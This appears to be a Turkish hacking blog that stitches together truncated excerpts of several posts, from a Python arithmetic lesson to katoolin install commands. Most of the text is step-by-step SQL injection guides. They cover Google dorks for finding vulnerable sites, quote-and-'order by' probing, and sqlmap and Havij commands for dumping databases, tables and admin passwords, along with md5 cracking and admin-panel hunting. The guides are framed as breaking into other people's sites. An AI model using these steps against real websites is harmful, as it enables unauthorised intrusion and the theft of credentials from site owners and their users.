AquieLL l Siber Güvenlik

Merhaba dostlar, görüldüğü üzere python diline'de el atmış bulunmaktayım.Bazıları soracaktır neden böyle birşey yapıyorsun ? Arkadaşlar bu dil üzerinde kendimi geliştirmek istiyorum ve öğrendiklerimi buraya aktarmak istiyorum.Şuanlık 4-5 Derslik birşey biliyorum.Böylece hemen tekrar etmiş olacağım ve sizlere bu bilgileri paylaşmış olacağım.Dersler kendi çıkardığım notlardan olacak haydi başlayalım . ------------------------------------------------------------------------ // Python Dersleri - 1 [ SAYILAR ] // AquieLL  İşlem Operatörleri : Kod: + Toplama - Çıkarma * Çarpma / Bölme ---   Arkadaşlar python sayıları direk algılayabilir ve Sonucu bize verebilir.Şöyle örneğini görelim Kod: >> 3 + 5 >> 8 Kod: >>5 - 2 >> 3 Kod: >>5 * 4 >>20 Kod: >>20 / 5 >>4 Gibi işlemleri direk yapabiliyoruz . ---   Peki Python'da Bir sayının üslü ifadesini nasıl bulabiliriz.Arkadaşlar bunu " ** " ifadesi ile yap

Merhaba arkadaşlar burada sql hacking ile ilgili bir örnek saldırı videosu çektim.SQL hack ile ilgili son konu video içeriği olarak ; Açıklı site, havij ile veritabanına ulaşma,md5 çözme,panel bulma ve hackleme işlemleri vardır. İyi seyirler. 

Merhaba arkadaşlar  Bu konunun direk videosunu çektim ; video ;

Konu : // SQL İnjection Manual Hacking // AquieLL  Başlayalım... Elimizde Bir Site Var SQL Açıklı Olup Olmadığını Anlamak İçin İD=1 değerinin Sonuna   " 'a "   Ekliyoruz. Karşımıza Şöyle Bir Hata Benzeri Bir Hata Çıkarsa Site SQL Açıklı Bir Sitedir. Kod: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Kod: www.örneksite.com/hack.php?id=1 Biz SQL Hatamızı Aldık ve İlk Aşamamız Siteye  "+order+by+ " Komutunu Çalıştırmaktır. Hangi Order+by Komutunda SQL Hatamız Kalkarsa Kolon Sayımız O Sayıdır. Sitenin Sonuna "+order+by+1 , +order+by+2 vb" Ekleyelim. Yani ; Kod: www.örneksite.com/hack.php?id=1+order+by+1 (Hala SQL Hatası Var) Kod: www.örneksite.com/hack.php?id=1+order+by+2 (Hala SQL Hatası Var) Kod: www.örneksite.com/hack.php?id=1+order+by+3 (Hala SQL Hatası Var) Kod: www.örneksite.com/hack.php?id=1+order+by+4 (SQL

Merhaba arkadaşlar  bugünkü konumuz,dorkumuzu yazdık,açıklı site bulduk, sqlmap ile veritabanına sızmaya çalıştık ama veritabanını çekemedik işte burada sqlmap parametreleri devreye giriyor. iyi okumalar :)  video burada açıklaması aşağıda ; -------------------------------------- // PARAMETRE TANIMLARI //  --risk :   1 ile 3 arasında değerler alabilen parametremiz. Eğer belirtilmezse default olarak 1 değerini alır.  Risk  1 daha sınırlı sql cümleleri ile denetleme yapar.  Risk  2'de  risk  1'in üzerine heavy-query time based saldırılar da denetlemeye tabii tutulur.  Risk  3'te ise ekstradan Or-based testler de eklenir. --level :   1 ile 5 arasında değerler alabilen parametremiz. 1. seviyede daha kısıtlı testler denetlenirken, 5.seviyede daha fazla payload, daha detaylı prefix ve suffixler ile zenginleştirilmiş payloadlar kullanılmaktadır. Ayrıca HTTP Cookie başlığı 2.seviyeden sonra ve HTTP User-Agent/Referer başlıkları da seviye 3'ten sonra denetl

Merhaba arkadaşlar bu yazının konusu ; -Dork yazdık,açıklı site bulduk ve şimdi veritabanını hacklemek için havij yerine sqlmap ile veritabanına ulaşıyoruz. 1.1-)Python ve SQLMAP Kurulumu Gerekli Malzemeler ;  -Python 2.7.8 -sqlmap dosyası ("http://sqlmap.org/") Kurulumu ; -Python 2.7.8 bilgisayara indirip setup ile kuruyoruz -Daha sonra "sqlmap" adlı dosyayı " Bilgisayım >> Yerel Disk C:// " dizinine atalım. 1.2-)Hack Aşaması  1-)cmd açalım çalıştır >> cmd 2-)C://sqlmap klasörüne inelim tek tek yazıyoruz.  cd..  cd.. cd sqlmap   3-)Sitenin veritabanını çekelim. sqlmap.py -u sqlaçıklıurl --dbs Not: Bu işlemden sonra [Y/n] Sorusu gelecek hepsine "Y" Diyoruz. 4-)Sitenin Tablolarını çekelim sqlmap.py -u sqlaçıklıurl veritabanıadı --tables  5-)Sitenin Kolonlarını çekelim.Hangi kolonu istiyorsanız onu çekin. sqlmap.py -u sqlaçıklıurl -D veritabanıadı -T tabloadı --columns 6-)Çekitğimiz kolonda iş

Merhaba arkadaşlar  Yeni yazımızın konusu,dorkumuzu yazdık,açıklı sitemizi bulduk şimdi havij ile veritabanına ulaşmak. 1-)Havij 1.16 PRO İndirin. 2-)Havij açın. 3-)Üstteki "Target" Yazısına SQL Açıklı olan url'yi yapıştırın. 4-) "Analyze" butonuna basın. 5-)Bekleyelim... 6-) "Tables" kısmına basalım. 7-) "Get Tables" kısmına basalım. 8-) "admin,user,members" gibi kolonları tik olarak seçelim ve "Get Columns" kısmına basalım. 9-)Bilgisini almak istediğimiz kutucukları işaretleyelim "admin,password,email,ip" ve "Get Data" kısma basalım. 10-)Ve ekrana bilgilerimiz gelsin.  Bunula alakalı videom ;

Merhaba arkadaşlar **SQL Dorkunuzu yazdınız şimdi sitelerde nasıl açık olup olmadığını anlamak istiyorsanız yapmanız gerekenler şöyle ; 1-)Dork'u Google'de aratın --index.php?id= 2-)Siteler zaten şöyle olacak  - -www.örneksite.com/index.php?id=10    (10 örnektir başka birşeyde olabilir) 3-)İD Değerin sonuna ( tek tırnak ' ) koyun. --www.örneksite.com/index.php?id=10' 4-)Sitede bir bozulma,mysql hatalarından birini alıyorsanız site'de sql açığı mevcut demektir. Video'da çektim bunun için ;      

1-)Kelime Belirme :  Arkadaşlar Öncelikle Aklınızdan Bir Kelime Tutun.Ama Bu Kelime Güzel İnternet Aleminde Gerçekten Kullanılan bir Kelime Olmalı.Basit Kelimelerden Kaçının Brute'de Nasıl Günlük Hayatta Kullanılan Kelimeler Kullanılıyorsa Bunda'da Öyle Düşünün. Örnek Olarak Ben  " Teknoloji "   Kelimesini Seçtim  Kod: Teknoloji 2-)Sitenin Hangi Dilde Yazılmış Olduğuna Karar Veriniz. SQL Açıklar İçin " ASP " veya " PHP " Çok Kullanılan Bir Dildir.Hangi Dilde Yazmak İstediğinizi Seçmeniz Gerekiyor.İki Dilde'de Gerçek'den Doğru Kullanılırsa Güzel Sonuçlar Alacaksınız. Örnek Olarak Ben " PHP " Dilini Seçtim. Kod: PHP Hadi O Zaman İlk Dorkumuzu Yazalım     Kod: inurl:technology.php?id= İ lk Dorkumuz Bu Şekilde Bu Dork Sizlere " PHP Dilinde Yazılmış Teknoloji " Sitelerini Verecektir. Hadi O Zaman Dorkumuzu Bir Tık Daha Geliştirelim.  3-)Dorka Hedef Bir Ülke Ekleyelim. ( Zorunlu Değil Tabi İstersen

Merhaba arkadaşlar Ubuntu'da Kali Pentest araçlarını kullanmak isteyenler katoolin aracını yükleyebilirler. Komutlar şöyle ; *Yetki alalım sudo su *Github'dan indirelim   git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin *Yetkisini verelim  chmod +x /usr/bin/katoolin *Başlatalım  sudo katoolin ------------------------------------------ Ayrıca videodan tool'un iç ayarlarını yapabilirsiniz.